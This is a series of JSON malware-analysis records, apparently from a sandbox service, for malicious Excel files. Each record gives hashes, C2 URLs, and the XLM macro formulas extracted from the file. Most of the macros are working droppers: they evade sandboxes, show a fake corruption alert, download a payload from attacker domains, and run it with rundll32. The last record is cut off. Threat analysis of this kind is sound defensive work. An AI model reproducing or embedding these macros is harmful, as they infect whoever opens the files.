{"version":"0.2","sample":{"sample":"","kind":"file","target":"62199f463496b9d9bfe67892cbb6fafdc5e6a8c0c2c3f1697f1c2e66d671f118"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"62199f463496b9d9bfe67892cbb6fafdc5e6a8c0c2c3f1697f1c2e66d671f118","filesize":116224,"md5":"f64e91d40f0efc741cb36a456b718d5d","sha1":"6eb049890f427cee471ea0c0af81db4a80af067d","sha256":"62199f463496b9d9bfe67892cbb6fafdc5e6a8c0c2c3f1697f1c2e66d671f118","sha512":"3e2350e8c3f6cf71f1a3a57a9fcdff76bf4465806a603835b9091b499740c55bc8de0860be2970d2bb2423d2817b57901c8d80cc8c9ca1c79fa07f09903a11f8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"62199f463496b9d9bfe67892cbb6fafdc5e6a8c0c2c3f1697f1c2e66d671f118.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mmDpkz5y0e\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"622ff3328672bfad931ba1774d2a99d98011fd5dd6ec08da0b5d9b5f6117b6f9"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"622ff3328672bfad931ba1774d2a99d98011fd5dd6ec08da0b5d9b5f6117b6f9","filesize":120320,"md5":"f41901a711f0cab7dd45fb095aca4415","sha1":"64f7b966ccb308e37d03ba0faace7fb31dd9d678","sha256":"622ff3328672bfad931ba1774d2a99d98011fd5dd6ec08da0b5d9b5f6117b6f9","sha512":"f395b383732989d1ee03dbfd9a517fd49e3ec939849019cbdf83fe5a0bad6b062184ee0feeb41f45716f0562663e451c777a74098e59d3d244379b555101d334","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"622ff3328672bfad931ba1774d2a99d98011fd5dd6ec08da0b5d9b5f6117b6f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4Q73FARTpj\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"625387ab59ccbf44365a5d571d6701ba77cab5fbca5ff304c96587a6593d297c"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"625387ab59ccbf44365a5d571d6701ba77cab5fbca5ff304c96587a6593d297c","filesize":62976,"md5":"51b274799dfa11b352c81e8de8a0c2ba","sha1":"9ef9dadba4576498b4c8174657200dc2a8a89075","sha256":"625387ab59ccbf44365a5d571d6701ba77cab5fbca5ff304c96587a6593d297c","sha512":"3e8ab10b8dd75bc2e477d29a9d358d8e1d8c8272657ad409c1278301e5ff2862834f0f08b6a4e4630dd0fc3afe13a4f65e1681e72a06e63b96ad895006ac87ab","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"625387ab59ccbf44365a5d571d6701ba77cab5fbca5ff304c96587a6593d297c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$82C$6,R$83C$6)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6275ec556a1f6eb34df49d45503f5bee2860167b4c0ad4c02fb85a3a53c3f8e6"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"6275ec556a1f6eb34df49d45503f5bee2860167b4c0ad4c02fb85a3a53c3f8e6","filesize":209920,"md5":"d6f46e88fe82153befadc7ba49bd7d94","sha1":"f51f147d98ee52ccbcadc9fb51fe3ede0ca8837a","sha256":"6275ec556a1f6eb34df49d45503f5bee2860167b4c0ad4c02fb85a3a53c3f8e6","sha512":"7cf649b984ccdeaf24fe091e78d2f861fda13a2eb4427851da08cef034b66d84b19876dede9b30aa8904cb5ca4703295ddec2ea5959cc2c9f2d2cdc848f3a8e4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6275ec556a1f6eb34df49d45503f5bee2860167b4c0ad4c02fb85a3a53c3f8e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"flIFezgbIc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"627796a6233d3a17eff81602085e4ae193947a76cb1204bf31dc835781d1d1f9"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"627796a6233d3a17eff81602085e4ae193947a76cb1204bf31dc835781d1d1f9","filesize":185344,"md5":"013c4562e322a92798d138a0e9b19673","sha1":"48379e50e62255235fab20049d851a0e417adec4","sha256":"627796a6233d3a17eff81602085e4ae193947a76cb1204bf31dc835781d1d1f9","sha512":"16fb4272e5744361e966da49c9e70846ea2ce822c787e687f66f46e566668e176e19d85763f7986b5000955ad428804060fafcf06fc93218ec67607d07d1431e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"627796a6233d3a17eff81602085e4ae193947a76cb1204bf31dc835781d1d1f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"62f8b89b5a46942673c94102d00670081ff7bfc08cae5b1f2da5b6df1d0bce28"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"62f8b89b5a46942673c94102d00670081ff7bfc08cae5b1f2da5b6df1d0bce28","filesize":104448,"md5":"ebbe491425c7ba0191d356b3e7b3d4d6","sha1":"08099dea19f2b4c85801087dc9789a0e5d816704","sha256":"62f8b89b5a46942673c94102d00670081ff7bfc08cae5b1f2da5b6df1d0bce28","sha512":"aa4b7af536eac0116488a0da00c5db946acd82456d79a4b338f7997745b89ba35b8d20cbac88b4974dc549a43abce1772ecf5c719a33938940ed49ff197aba60","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"62f8b89b5a46942673c94102d00670081ff7bfc08cae5b1f2da5b6df1d0bce28.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"dqOZ4ipW4F\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"62fd33006f20525ceb2b6829113df8a515857ce336af2831c4c05ee28a4222c9"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"62fd33006f20525ceb2b6829113df8a515857ce336af2831c4c05ee28a4222c9","filesize":185344,"md5":"920e6c3a7839708c9404907c45c4ee4e","sha1":"8d6ed28efbbb85e77958659746e320d8a7d4aded","sha256":"62fd33006f20525ceb2b6829113df8a515857ce336af2831c4c05ee28a4222c9","sha512":"ed34beb9f6d4e0c8a28ddf8f74020963b51307ab8607a7829982885fd92775e4392c2d48c0bf51b98a07d1732997b8c3815ed0ccef22b8b16661d1b8519a902d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"62fd33006f20525ceb2b6829113df8a515857ce336af2831c4c05ee28a4222c9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6333bb4704725826674599aa956632b6a9d073be05e7dddbd137768b59197172"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"6333bb4704725826674599aa956632b6a9d073be05e7dddbd137768b59197172","filesize":212992,"md5":"626707602f965d88a4bba88170c27b5e","sha1":"d33c879fa861275b501d66562ec44a0676d0dcbf","sha256":"6333bb4704725826674599aa956632b6a9d073be05e7dddbd137768b59197172","sha512":"b228f7f6350c7358f8c87d0f4ff58da5f1beecb6d482ad94bd0e4db6c26377d192b6bcdb192baf40c3a9cf0df4f420856d7122b25bfc7573eeea04c07940bd7d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6333bb4704725826674599aa956632b6a9d073be05e7dddbd137768b59197172.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hBMTeNRQ1o\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"633ae825b74428f384027973449247e158b624252f4d378a8bae32a11ce49268"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"633ae825b74428f384027973449247e158b624252f4d378a8bae32a11ce49268","filesize":225280,"md5":"4b0556192d8fcbcd123098c5c8b0c1f9","sha1":"23da492f2fb57f71198836352f706085d6b77665","sha256":"633ae825b74428f384027973449247e158b624252f4d378a8bae32a11ce49268","sha512":"8f074c4210bb90fa19c5205a6a7b79d6badf52e9c6b7c4be3f052945eccbd3a751bc7f867271ecc4260338de4e61b05c7f3655a2eac41d401746996baffff383","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"633ae825b74428f384027973449247e158b624252f4d378a8bae32a11ce49268.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Lqevhm0Fhs\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"635ae5b343ea493da1ba7b0d5280dd2c61849081d5eb872e3983dd3f69f4dfee"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"635ae5b343ea493da1ba7b0d5280dd2c61849081d5eb872e3983dd3f69f4dfee","filesize":167936,"md5":"76255f2a8a0b9e48649c93f6f778120a","sha1":"91b5d078b7b21761b14becaa8dd4cd2a13b90983","sha256":"635ae5b343ea493da1ba7b0d5280dd2c61849081d5eb872e3983dd3f69f4dfee","sha512":"ce27d761e22561011e7b6b76b63d5b9bb7513a989a3624d0f5eaeefd640d98fa04a703acd45a9811220a2506407fe16c27eaab64ad661c8141322e19bd489310","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"635ae5b343ea493da1ba7b0d5280dd2c61849081d5eb872e3983dd3f69f4dfee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NG0VPnPiEL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"636200d341f735c2b6bae062845b5e48e0aea6e5217f5f5668fd457930159a16"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"636200d341f735c2b6bae062845b5e48e0aea6e5217f5f5668fd457930159a16","filesize":185344,"md5":"da02062bae4a7cc21bf08f1a06258317","sha1":"a477e644d40b7297f39945b6c53ffaae4e44dd59","sha256":"636200d341f735c2b6bae062845b5e48e0aea6e5217f5f5668fd457930159a16","sha512":"a281067ab984c3f304a1a6faff4aa393eac6cd1884a101746d34b6ce181fbc7e00651fa2fbce17a663f031de4d12d6ffa7e33a05ffdfd22cfd024719d25fd4ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"636200d341f735c2b6bae062845b5e48e0aea6e5217f5f5668fd457930159a16.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6373c90d6417615af4a135f4377202b11dd7cda31ed7b01ef4e71a6b362bbe48"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"6373c90d6417615af4a135f4377202b11dd7cda31ed7b01ef4e71a6b362bbe48","filesize":160768,"md5":"b7ee9863c36faba3d84e457babab705f","sha1":"ffb18fb48714b19e3fea530796e66e43b0a988a1","sha256":"6373c90d6417615af4a135f4377202b11dd7cda31ed7b01ef4e71a6b362bbe48","sha512":"ff063b34d1dec03ab1ac844a5c8080093687f472a9eb1d8dcaecb961a753758cefcd3be8ac14085b59b396522d60121e0e83731b6e899daa59afc462d6d4bf0a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6373c90d6417615af4a135f4377202b11dd7cda31ed7b01ef4e71a6b362bbe48.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ztKX6NlAWq\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63994b0a57bc5396c156efc465b49c35b491510a5bdfdea9f987814235337c2a"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63994b0a57bc5396c156efc465b49c35b491510a5bdfdea9f987814235337c2a","filesize":206336,"md5":"fcdfb835b3465297ce53d45f1737a77c","sha1":"b4dba09ab49e5485165a2e99dd515bde6d8ae53a","sha256":"63994b0a57bc5396c156efc465b49c35b491510a5bdfdea9f987814235337c2a","sha512":"7d6cf8e6de51a767b631147b62f8088384a17efe2121fce0c5610a8e614b0525dd53877eadae60b12770873b17d543c362d3051d3ba6d13b7318ab850b211c8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63994b0a57bc5396c156efc465b49c35b491510a5bdfdea9f987814235337c2a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oMp6A5rLn6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63a3bf8dde3cc18b31e59b01cae5379b8cbda009a3c3f3b8c10524ffce471ac1"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63a3bf8dde3cc18b31e59b01cae5379b8cbda009a3c3f3b8c10524ffce471ac1","filesize":207360,"md5":"06da0c69a541fc8b3506ad1bbe5bd51a","sha1":"dc84e327fc7ca4619e2c8e29719c25c010c4f7a8","sha256":"63a3bf8dde3cc18b31e59b01cae5379b8cbda009a3c3f3b8c10524ffce471ac1","sha512":"aa1d88af5577293c79b9e7179526342ea03383a03a107464bec68faf9b122f2f2d7e175869ca538334ba9cde410a2018bd690626a15912fd16ab4c0ebce02eef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63a3bf8dde3cc18b31e59b01cae5379b8cbda009a3c3f3b8c10524ffce471ac1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gIMrL3Bk9l\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"63a7cc7a3206c3dc7450b8a5f00187b426153da6377a76c3cdbb3aafc39fe714"},"analysis":{"reported":"2020-04-09T16:16:38Z","score":10},"files":[{"filename":"63a7cc7a3206c3dc7450b8a5f00187b426153da6377a76c3cdbb3aafc39fe714","filesize":112640,"md5":"a233dbe6f003a42da30c4f2e8387b294","sha1":"b7c2ff57180ea2d0f7e7d7ee5cedbe78c2bf94c0","sha256":"63a7cc7a3206c3dc7450b8a5f00187b426153da6377a76c3cdbb3aafc39fe714","sha512":"08505153d75a74015e3a73a4bbdb9c3546ce49b670d4a99c927cffa72e769b1a43915bd799049c4a862cb2177e46fe7aabb7a3e421311c7c1a7121a9809f4e0b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"63a7cc7a3206c3dc7450b8a5f00187b426153da6377a76c3cdbb3aafc39fe714.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office 